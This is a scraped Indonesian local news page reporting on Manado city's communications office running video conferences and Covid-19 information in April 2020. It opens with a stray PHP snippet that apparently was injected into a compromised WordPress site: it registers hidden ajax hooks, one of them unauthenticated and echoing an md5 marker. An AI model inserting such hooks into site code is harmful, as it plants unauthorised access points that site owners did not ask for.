function bestrock_render_js(){ } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ } add_action('wp_head', 'bestrock_render_js'); add_action('wp_ajax_qgt', 'bestrock_render_index'); add_action('wp_ajax_nopriv_wrt', 'bestrock_render_ajax'); Dinas Kominfo Fasilitasi Rapat Pemkot Manado via Video Confrence – IndoSulut

Menu

Mode Gelap
Rektor Sompie Lantik Enam Pejabat Baru Unsrat Walikota Manado Terima Kunjungan BPK RI Sulut Kementrian Lingkungan Hidup Gelar TOT Akademisi Tahap IV di UNSRAT Manado Walikota Manado Gelar Rapat Teknis Soal Relokasi Warga Korban Bencana Wali Kota dan Wakil Wali Kota Manado Hadiri Acara Penyerahan Sertifikat Tanah

Uncategorized · 13 Apr 2020 21:11 WIB ·

Dinas Kominfo Fasilitasi Rapat Pemkot Manado via Video Confrence


					Dinas Kominfo Fasilitasi Rapat Pemkot Manado via Video Confrence Perbesar

Jajaran kepala SKPD Pemkot Manado saat melakukan rapat via vidcon bersama Wali Kota dan Wakil Wali Kota Manado.

 

MANADO – Pemerintah Kota Manado melalui Dinas Komunikasi dan Informatika (Kominfo) tidak pernah berhenti dalam melakukan sosialisasi kepada masyarakat untuk melakukan sosial distancing dan mengingatkan soal protokoler kesehatan. Tidak hanya itu, Kominfo Manado setiap hari melakukan sosialisasi tentang surat edaran walikota dan lain-lain, hal ini seperti disampaikan Kadis Kominfo Manado, Erwin Kontu, SH.,MH, Senin (13/4/2020).

Jebolan Fakultas Hukum Unsrat Manado ini juga menyampaikan perihal kerja sama lintas sektoral yang dilakukan guna menghindari penyebaran Virus Corona (Covid-19). Menurutnya, himbauan dan anjurang Wali Kota dan Wakil Wali Kota Manado tidak hanya disampaikan pihaknya, melainkan dijalankan.

“Kominfo juga bersama Bapelitbang membuat website si panser dimana masyarakat bisa melihat data pertambahan pasien Covid juga penyebarannya melalui peta. Kita menerapatkan secara konsisten himbauan dan arahan Pak Wali Kota bersama Pak Wakil Wali Kota,” ujar Kontu.

Berbagai aktivitas ditengah penyebaran wabah Corona ini dilakukan dengan mengandalkan kecanggihan teknologi informasi. Sehingga tugas-tugas pelayanan kepada masyarakat tetap berjalan sebagaimana mestinya. Tidak terbengakalai pelayanan publik.

“Kominfo juga menjembatani Vidcom melalui aplikasi zoom Konferensi Pers walikota dengann teman-teman media. Pada intinya Kominfo selalu menjembatani informasi yang disampaikan pemerintah pusat supaya supaya bisa cepat sampai ke masyarakat, terlebih situasional seperti saat ini dgn adanya virus Corona informasi harus secepatnya disampaikan kepada masyarakat,” kata Erwin menutup. (Tim)

Artikel ini telah dibaca 4 kali

badge-check

Penulis

Baca Lainnya

Safari Ramadhan Pemkot Manado di Kampung Jawa, Wali Kota: Kita Berikan Contoh Baik untuk Indonesia

26 Maret 2024 - 18:18 WIB

Inspektorat: Pemkot Manado Tidak Pernah Anggarkan Belanja Souvenir Seharga 3.8 Miliar

10 Maret 2024 - 10:58 WIB

Wali Kota Manado: Program Dana Duka diganti Bantuan Duka

27 Februari 2024 - 13:25 WIB

Capai 15 Ribu Suara Total, PDI Perjuangan Peluang 3 Kursi Dapil Tuminting – Bunaken

16 Februari 2024 - 21:31 WIB

Tertib saat Ikuti Kampanye, Richard Sualang Beri Apresiasi untuk Warga

1 Februari 2024 - 22:55 WIB

KPU Manado: Tidak Ada Potongan Apapun untuk Anggaran KPPS, Masyarakat Jangan Percaya Hoaks

30 Januari 2024 - 09:00 WIB

Trending di Uncategorized